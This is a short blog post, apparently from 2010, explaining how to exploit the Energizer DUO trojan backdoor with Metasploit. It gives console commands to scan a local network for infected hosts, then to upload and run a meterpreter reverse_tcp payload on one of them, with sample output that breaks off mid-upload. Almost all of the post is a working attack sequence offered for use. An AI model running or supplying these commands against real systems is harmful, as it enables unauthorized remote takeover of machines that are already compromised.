Posts

Showing posts from March, 2010

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on 10.0.0.23:4444

[*] Trying to upload C:\NTL0ZTL4DhVL.exe...

[*] Trying to execute C:\NTL0ZTL4DhV…